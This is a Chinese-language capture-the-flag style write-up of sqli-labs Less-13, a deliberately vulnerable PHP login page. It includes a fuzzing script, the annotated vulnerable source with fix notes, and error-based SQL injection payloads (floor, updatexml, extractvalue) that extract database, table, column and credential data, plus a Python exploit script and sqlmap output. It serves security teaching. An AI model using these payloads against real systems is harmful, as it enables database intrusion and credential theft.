sqli-lab-less13

一、靶标地址

Less-13 POST-Double Injection- Single Quotes-string -with twist
#字符型带单引号括号的双注入
http://127.0.0.1/sqli/less-13/

二、漏洞探测

输入admin admin
得到post数据包
uname=admin&passwd=admin&submit=Submit
#无任何回显

猜测业务逻辑流程应该是根据输入的username、password去查询然后进行比对
uname=1')&passwd=2&submit=Submit
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and password=('2') LIMIT 0,1' at line 1

报错信息中泄露的语句片段为 ') and password=('2') LIMIT 0,1
推测语句为select username,password from users where username= ('$uname') and password=('$passwd') limit 0,1;
fuzz.txt
'
"
')
")
'))
"))
#使用python脚本进行fuzz
import requests

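# Local sqli-labs Less-13 deployment used throughout this write-up.
url = "http://192.168.128.159/sqli/less-13/index.php"

# Request headers copied from the browser (F12 / Burp Suite capture).
header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36",
    "Accept-Language": "en-US,en;q=0.9",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
}

# One quote/bracket prefix per line (the fuzz.txt list above, saved as fuzz-13.txt).
# The context manager closes the handle even if a later request raises;
# the original left the file open for the lifetime of the script.
with open("./fuzz-13.txt", "r", encoding="utf-8") as fuzz_file:
    payloads = fuzz_file.read().splitlines()

for i, prefix in enumerate(payloads):
    print(f"==============This is {i}{prefix}==============")
    # Only uname varies; passwd stays fixed so any SQL error in the reply is
    # attributable to the uname field.
    payload = {
        "uname": "1" + prefix,
        "passwd": "1",
    }
    # Bounded wait so a hung lab VM cannot stall the loop indefinitely.
    response = requests.post(url, headers=header, data=payload, timeout=10)
    # The raw body is printed; the page echoes mysql_error(), so a quoting
    # mismatch shows up as a MySQL syntax error in the output.
    print(response.text)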

三、源码分析

<?php
// sqli-labs Less-13 login handler (the intentionally vulnerable lab source).
// Both POST fields are spliced into the SQL string below without escaping or
// parameter binding, and the failure branch prints mysql_error() to the page:
// together these are what make the error-based injection in this write-up work.
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
// PHP-level error reporting is switched off; the database error text is still
// printed explicitly further down via mysql_error().
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
	// Raw, unvalidated request values; they are used verbatim in the query.
	$uname=$_POST['uname'];
	$passwd=$_POST['passwd'];

	//logging the connection parameters to a file for analysis.
	// NOTE: the plaintext username and password (and any injected payload)
	// are appended to result.txt next to the script on every request.
	$fp=fopen('result.txt','a');
	fwrite($fp,'User Name:'.$uname."\n");
	fwrite($fp,'Password:'.$passwd."\n");
	fclose($fp);


	// connectivity 
	// INJECTION POINT: string interpolation of $uname / $passwd into the query.
	// The ('...') wrapping is why the write-up's payloads begin with ') to close
	// the literal and the bracket. The legacy mysql_* extension used here has
	// no bound parameters; the fix is a prepared statement (mysqli or PDO) with
	// placeholders for both values. The leading @ silences warnings from this
	// statement only.
	@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	// A matching row means "logged in", but every echo of $row is commented
	// out, so the success branch shows only the flag image and leaks no data.
	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in " ;# a successful query produces no visible text
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		//echo 'Your Login name:'. $row['username'];
		//echo "<br>";
		//echo 'Your Password:' .$row['password'];
		//echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"   />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		// Error oracle: the verbatim MySQL error message is written into the
		// response, which is the channel the error-based payloads read from.
		// Hardening: log the error server-side and return a generic message.
		print_r(mysql_error());# database error text is echoed to the page
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"   />';	
		echo "</font>";  
	}
}

?>

四、黑盒与白盒测试

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
print_r(mysql_error());#有报错回显
1、floor()函数报错
#获取数据库 用户 版本号
uname=1') union select 1 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a #&passwd=1&submit=Submit

#获取表名
uname=1') union select 1 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd=1&submit=Submit 

#获取列名
uname=1') union select 1 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd=1&submit=Submit

#获取用户名
uname=1') union select 1 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a #&passwd=1&submit=Submit

2、updatexml()函数报错

#获取数据库名
uname=1') and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) # &passwd=1&submit=Submit

#获取表名
uname=1') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) #&passwd=1&submit=Submit 

#获取列名
uname=1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) #&passwd=1&submit=Submit

#获取列字段
uname=1') and updatexml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),0) #&passwd=1&submit=Submit
uname=1') and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) #&passwd=1&submit=Submit

3、extractvalue()函数报错
uname=1') union &passwd=1&submit=Submit

#获取当前数据库名
uname=1') union select 1,2,extractvalue(1,concat(0x7e,(select database()))) #&passwd=1&submit=Submit

#获取表名
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #&passwd=1&submit=Submit

#获取列名
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) #&passwd=1&submit=Submit

#获取列字段
uname=1') and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e)) #&passwd=1&submit=Submit
uname=1') and extractvalue(1,concat(0x7e,(select password from security.users limit 0,1),0x7e)) #&passwd=1&submit=Submit

五、脚本撰写

import requests

# Local sqli-labs Less-13 login handler used throughout this write-up.
url = "http://192.168.128.159/sqli/less-13/index.php"

# Browser-like headers (taken from an F12 / Burp Suite capture).
ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36"
accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
header = {"User-Agent": ua, "Accept-Language": "en-US,en;q=0.9", "Accept": accept}

# The floor()/rand() error-based probe from section 四, sent in the uname field.
uname_value = (
    "1') union select 1 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a #"
)
payload = {"uname": uname_value, "passwd": "admin"}

# The page echoes mysql_error(), so the result shows up in the response body.
response = requests.post(url, headers=header, data=payload)
print(response.text)

六、sqlmap

sqlmap -u "http://192.168.128.159/sqli/Less-13/" --data "uname=1&passwd=1&submit=Submit" --batch

Parameter: uname (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=1') AND (SELECT 2518 FROM(SELECT COUNT(*),CONCAT(0x71716a6a71,(SELECT (ELT(2518=2518,1))),0x7170706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Sahm&passwd=11&submit=Submit

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=1') AND (SELECT 8260 FROM (SELECT(SLEEP(5)))rllL)-- nwQS&passwd=11&submit=Submit

七、总结

1、最好使用group_concat函数保证一次性输出,减少payload
2、本关通过 print_r(mysql_error()) 将数据库报错回显到页面,因此可以使用报错注入